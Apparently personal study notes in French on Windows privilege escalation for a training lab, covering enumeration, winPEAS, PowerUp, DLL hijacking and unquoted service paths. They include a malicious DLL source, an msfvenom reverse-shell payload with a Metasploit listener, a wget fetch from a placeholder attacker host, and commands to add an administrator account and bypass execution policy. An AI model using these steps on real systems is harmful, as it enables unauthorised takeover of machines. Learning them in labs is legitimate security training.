Windows dispose de plusieurs catégories d'utilisateurs dont ceux disposant d'un privilège élevé faisant objectif de notre 

recherche sont:

Utilisateur régulier disposant de plus de priviloège

Administrateur local

Standard de domaine

Administrateur de domaine

Les comptes systèmes ne permet de se connectés mais peuvent servir pour l'élevation de peivilège.

En règle générale, l'élévation des privilèges vous obligera à suivre une méthodologie similaire à celle indiquée ci-dessous :

Énumérer les privilèges et les ressources de l'utilisateur actuel auxquels il peut accéder.

Si le logiciel antivirus le permet, exécutez un script d'énumération automatisé tel que **winPEAS** ou **PowerUp.ps1**

Si l'énumération et les scripts initiaux ne révèlent pas de stratégie évidente, essayez une approche différente (par exemple,

parcourez manuellement une liste de contrôle comme celle fournie [ici](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md))

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

<details><summary>Information Gathering </summary>

`whoami /priv`   Les privilèges de l'utilisateur courant 

`net users`      Liste des utilisateurs

`net user username newpassword` pour changer password d'un compte

`net user username ` comme `net user Administrator` donne les détiles sur l'utilisateur

`qwinsta` ou `query session`   d'autres utilisateurs se sont connectés simultanément

`net localgroup` les groupes d'utilistauers définis sur le système

`net localgroup groupname`    pour les détails sur groupe

`systeminfo`   pour les infos sur le sytème

`copy \\@IP\directory\file` pour télécharger un fichier d'un hote vers windows

`systeminfo | findstr /B /C:"OS Name" /C:"OS Version"` pour une sortie des infos de farçcon breve

`hostname`  pour avoir le nom de la marchine, cela peut reveler le pourquoi il est utilisé et un nom d'utilisateur

`findstr /si password *.txt` pour recherche de fichier avec` findstr`

Se connecter avec RDP

`xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:MACHINE_IP /u:Administrator /p:'TryH4ckM3!'`

Ajouter un utilisateur

`net user <username> <password> /add`

`net localgroup administrators <username> /add`

Sous la racine, ceci est mieux pointure: `dir file_name /s`

findstr : recherche des modèles de texte dans les fichiers.

**/si** : Recherche le répertoire courant et tous les sous-répertoires, ignore les différences majuscules/minuscules (**i**)

**password** : La commande recherchera la chaîne « password » dans les fichiers

***.txt** : la recherche couvrira les fichiers ayant une extension .txt

La chaîne et l'extension de fichier peuvent être modifiées en fonction de vos besoins et de l'environnement cible, mais 

".txt", ".xml", ".ini", "*.config" et ".xls" sont généralement un bon endroit pour début.


<details><summary>Patch level
</summary>

Un patch critique manquant sur le système cible peut être un ticket facilement exploitable pour une escalade de privilèges

Microsoft publie régulièrement des mises à jour et des correctifs pour les systèmes Windows. Un patch critique manquant sur le système cible peut être un ticket facilement exploitable pour l'escalade de privilèges. La commande ci-dessous peut être utilisée pour répertorier les mises à jour installées sur le système cible.

`wmic qfe get Caption,Description,HotFixID,InstalledOn`

</details>

<details><summary>Network Connections</summary>
 
`netstat -ano`  liste les ports en écoute sur la machine

-a :  affiche toutes les connexions actives et les ports d'écoute sur le système cible.

-n :  Empêche la résolution de nom. Les adresses IP et les ports sont affichés avec des nombres au lieu de tenter de résoudre  les noms à l'aide de DNS.

-o : affiche l'ID de processus à l'aide de chaque connexion répertoriée.
 
Si un service exploitable tourne sur un port local, nous pouvons rechercher les ports forwading et prendre par eux...

</details>

<details><summary>Scheduled Tasks</summary>

Les tâches planifiées

Les tâches planifiées utilisant un compte privilégié dont l'on peut modifier le fichier donne un accès facile à l'escalade de privilège.

`schtasks /query /fo LIST /v`  pour lister ces tâches.

</details>

<details><summary>Drivers</summary>


Les drivers sont des logiciels de base interagissant avec le systèmes, mais qui ne sont pas d'habitude mise à jour comme le sytème .... Certains d'entre eux peuvent etre source d'escalade de privilèges.

`driverquery`

Rechercher en ligne ceux pouvant vous donner cet accès.

</details>

<details><summary>Antivirus</summary>

Les antivirus bloquent souvent l'accès au shell lorsque vous utilisez un tronjan ou un programme malveillant détectable...
En règle générale, vous pouvez adopter deux approches : rechercher spécifiquement l'antivirus ou répertorier tous les services en cours d'exécution et vérifier ceux qui peuvent appartenir à un logiciel antivirus et mettre fin à ces tâches.

L'antivirus par défaut sur windows est windows defender, la commansde suivante returne l'état de cet antivieus diont le service est windefend.

`sc query windefend`

La deuxième méthode permet de lister les antivirus sans connaissance préalables des noms mais avec une sortie ecrassante

`sc queryex type=service`

</details>

</details>


<details><summary>Tools of the trade </summary>

<details><summary>WinPEAS</summary>

**WinPEAS** est un script développé pour énumérer le système cible afin de découvrir les chemins d'escalade des privilèges.
Il est détectable et estt bloqué par windows defender. 
La sortie de winPEAS peut être longue et parfois difficile à lire. C'est pourquoi il serait bon de toujours rediriger la sortie vers un fichier, comme indiqué ci-dessous.

`winpeas.exe > outputfile.txt`

</details>

<details><summary>PowerUp</summary>

PowerUp est un script PowerShell qui recherche l'escalade de privilèges commune sur le système cible. Vous pouvez l'exécuter avec l'option `Invoke-AllChecks` qui effectuera toutes les vérifications possibles sur le système cible ou l'utiliser pour effectuer des vérifications spécifiques (par exemple, l'option `Get-UnquotedService` pour rechercher uniquement les vulnérabilités potentielles de chemin de path non citées).

If faut avoir contourner les restriction d'éxécution avant de le lancer.

`powershell.exe -nop -exec bypass`

`Import-Module .\\PowerUp.ps1`

`Invoke-AllChecks`

</details>

<details><summary>Windows Exploit Suggester </summary>

Certains outils nécéssitant de tourner sur le système cyble peuvent etre détecté et supprimé par les antivirus...

Celui ci (qui est en python) évite cela en tournant sur la machine de l'attaquant.

`windows-exploit-suggester.py –update` mise à jour de la base de donnée

`systeminfo`  exécuter sur la cible et redirigé la sortie vers un fichier txt à copier sur la machine attaquante

Une fois cela fait, windows-exploit-suggester.py peut être exécuté comme suit:

`windows-exploit-suggester.py --database 2021-09-21-mssb.xls --systeminfo sysinfo_output.txt`

<details><summary>Metasploit</summary>

Si vous avez déjà un shell Meterpreter sur le système cible, vous pouvez utiliser le module multi/recon/local_exploit_suggester pour répertorier les vulnérabilités susceptibles d'affecter le système cible et vous permettre d'élever vos privilèges sur le système cible.

</details>

</details>
</details>

<details><summary> Vulnerable Software </summary>

`wmic` et `wmic product` pour lister les logiciels installés sur le système et les versions et autre infos.

Cette sortie n'est pas souvent si comprehensible... Filtrez la sortie avec:

`wmic product get name,version,vendor`

Vérifier les processus en cours:

`wmic service list brief` pour mieux lire la sortie, il faut `wmic service list brief | findstr  "Running"`

`sc qc logiciel` pour avoir plus d'infos sur logiciel

</details>

<details><summary>DLL Hijacking </summary>

Les fichiers DDL sont comme fes fichiers èxécutables qui doivent etre èxécuté par d'autre .exe,
Ainsi si nous pouvons remplacer le fichier DDL d'une application, on mettra alors notre propre fichier.

**Introduction to DLL Files**

Les fichiers DDL se localise dans `C:\\Windows\\System32`

`wmic service get name,displayname,pathname,startmode` pour lister les services en cours

En résumé, pour les applications de bureau standard, Windows suivra l'un des ordres répertoriés ci-dessous (pour rechercher le fichier DLL) selon que le SafeDllSearchMode est activé ou non.

**Si SafeDllSearchMode est activé, l'ordre de recherche est le suivant :**

Répertoire à partir duquel l'application a été chargée.

Le répertoire système. Utilisez la fonction `GetSystemDirectory` pour obtenir le chemin de ce répertoire.

Le répertoire système 16 bits. Il n'y a pas de fonction qui obtient le chemin de ce répertoire, mais il est recherché.

Le répertoire Windows. Utilisez la fonction `GetWindowsDirectory` pour obtenir le chemin de ce répertoire.

Le répertoire courant.

Les répertoires répertoriés dans la variable d'environnement `PATH`. Notez que cela n'inclut pas le chemin d'accès par application spécifié par la clé de registre App Paths. La clé App Paths n'est pas utilisée lors du calcul du chemin de recherche DLL.



**Si SafeDllSearchMode est désactivé, l'ordre de recherche est le suivant :**

Répertoire à partir duquel l'application a été chargée.

Le répertoire courant.

Le répertoire système. Utilisez la fonction `GetSystemDirectory` pour obtenir le chemin de ce répertoire.

Le répertoire système 16 bits. Il n'y a pas de fonction qui obtient le chemin de ce répertoire, mais il est recherché.

Le répertoire Windows. Utilisez la fonction `GetWindowsDirectory` pour obtenir le chemin de ce répertoire.

Les répertoires répertoriés dans la variable d'environnement PATH. Notez que cela n'inclut pas le chemin d'accès par application spécifié par la clé de registre App Paths. La clé App Paths n'est pas utilisée lors du calcul du chemin de recherche DLL.

<details><summary>Finding DLL Hijacking Vulnerabilities</summary>

L'outil que vous pouvez utiliser pour trouver les vulnérabilités potentielles de piratage de DLL est Process Monitor (ProcMon).

Il s'exécute avec les droits d'admin.. Il faut donc l'éxécuter sur une autre marchine que la cible et de faire les recherche.
L'éxecution d'une application dont le fichier DLL est signalé non retrouvé peut etre exploité

</details>

<details><summary>Creating the malicious DLL file</summary>

Les DLL sont des fichiers exécutables qui contiendront des commandes ou de code qui seroont exécutés par le système.

Voici un exemplaire de DLL que vous pouvez adapter à vos besoin:

               
    #include <windows.h>

    BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
        if (dwReason == DLL_PROCESS_ATTACH) {
            system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
            ExitProcess(0);
        }
        return TRUE;
    }

        
Nous pouvons générer le fichier DLL ci-dessus avec la commande:

    x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

Si le compilateur n'était pas installé: `apt install gcc-mingw-w64-x86-64`

Nous devons donner exactement le nom du fichier DLL rechercher par l'application ciblé à notre fichier DLL de sortie lors de compilation

Deplacer le dans l'endroit où il etait recherché.... 

`wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll`

`wget` pour le télecharger sur la cible.

Vous devez réalumer le service dllsvc avec:

`sc stop dllsvc & sc start dllsvc`
</details>

</details>

<details><summary> Unquoted Service Path </summary>

Au lancement de windows, il recherche certains services defaçcon automatique qu'il doit éxécuter. 
La recherche du service se fait suivant le chemain de l'éxécutable donnée.

si le chemain n'est aps écrit dans double côtes, et que l'un des dossiers du chemain contient d'espace, windows ajoutera .exe à la fin du premier mot de du nom de ce dossier et vérifiéra son éxistance, si non il continu avec même processus jusqu'à ce que j'exécutable soit trouvé .

exemple: C:\Program Files\topservice folder\subservice subfolder\srvc.exe
Il recherchera C:\Program.exe, C:\Program Files\topservice.exe ...

Alorsque si le chemain est entre double cote, il ira de but sur le fichier indiqué. L'exploitation de cette vulnérabilité qui consiste à placer un exécutable malveillant à un endroit (comme  C:\Program.exe) nécéssite qu'on n'est les droits d'écriture sur ce dossier.

**Recherche de vulnérabilités de chemin de service non citées**

Des outils tels que **winPEAS** et **PowerUp.ps1** détectent généralement les chemins de service non cités. Mais nous devrons nous assurer que les autres conditions requises pour exploiter la vulnérabilité sont remplies. Ceux-ci sont:

Pouvoir écrire dans un dossier sur le chemin

Pouvoir redémarrer le service

`wmic service get name,displayname,pathname,startmode` va lister les services en running sur la cible et les chemains ainsi

qu'autres infos. Une fois la sortie anlysée vous constaterez que les services vulnérables seront avec ds chemains sans guillemets.Mais n'oublier pas les conditions pour l'exploitation.

`sc qc nom_service`  resortira le chemain de l'exécutable binaire

Une fois confirmée que le chemain binaire est sans guillemets, nous allons vérifier nos droits sur les dossiers à fin de positionner notre propre fichier.

`.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"` donnera vos droits sur le dossier C:\Program Files\

`accesschk64.exe` est à upluader sur la cible, confert tools

Une fois le droit d'écriture confirmé, vous pouvez générez un exécutable reverse shell avec msfvenom et mettre votre machine en écoute avec multihandler meterpreter.

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[KALI or AttackBox IP Address] LPORT=[The Port to which the reverse shell will connect] -f exe > executable_name.exe


**Configurer meterpreter**


msf6 > `use exploit/multi/handler `

[*] Using configured payload windows/x64/shell_reverse_tcp

msf6 exploit(multi/handler) > `set payload windows/x64/shell_reverse_tcp`

payload => windows/x64/shell_reverse_tcp

msf6 exploit(multi/handler) > `set lport` 8899

lport => 8899

msf6 exploit(multi/handler) > `set lhost` 10.9.6.195

lhost => 10.9.6.195

msf6 exploit(multi/handler) > `run`

Une fois que vous avez généré et déplacé le fichier vers l'emplacement correct sur la machine cible, vous devrez redémarrer le service vulnérable.

`sc start service_name`


</details>


[Lab exercice et corrigés github](https://github.com/sagishahar/lpeworkshop)

[All tools privesc windows here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
